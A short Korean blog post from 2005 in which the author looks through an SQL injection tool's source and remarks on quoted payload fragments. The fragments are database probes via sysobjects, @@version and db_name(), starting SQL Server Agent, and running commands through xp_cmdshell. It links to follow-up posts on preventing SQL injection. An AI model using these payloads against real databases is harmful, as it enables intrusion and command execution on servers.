SQL Injection 프로그램의 소스를 보다..
일/Windows 2005/08/16 01:38
SQLSERVERAGENT도 막 돌리고... 계정도 이쁘게 만들어주고..
눈에 띄는 부분들이라면...
Url+ and (Select count(1) from [sysobjects])>=0) then
......
// 요건 아마도 URL에 쿼리를 날려서 사용자 정보를 얻는 것이겠지?
Url+ and |+@@version+|>0
// 요건 버전을 확인??
Url+ And |+db_name()+|=0
// 요건 DB명을 같은데...
아아.. 중간 생략이다.. 너무 보기가 귀찮다..
어랏..중간 넘어서 이런거 발견!!
master..xp_servicecontrol start,SQLSERVERAGENT
// SQL Server Agent도 실행하네...
MASTER..XP_CMDSHELL +CommandStr+>C:Command_Tmp.log......
// 오오... CommandStr을 받아서 실행하고 이 결과를 Command_Tmp.log 파일로 로그를 남기는군..
놀라워라~ 개발자들 많이 힘들겠다. 이런거 보면.....
- 2005/10/05 - SQL Injection 공격의 일반적인 방법들....
- 2006/05/09 - SQL Injection을 막는 방법 #1
- 2006/05/23 - SQL Injection을 막는 방법 #2
- 2006/05/26 - SQL Injection을 막는 방법 #3
- 2006/05/14 - SQL Injection을 막는 방법 #4
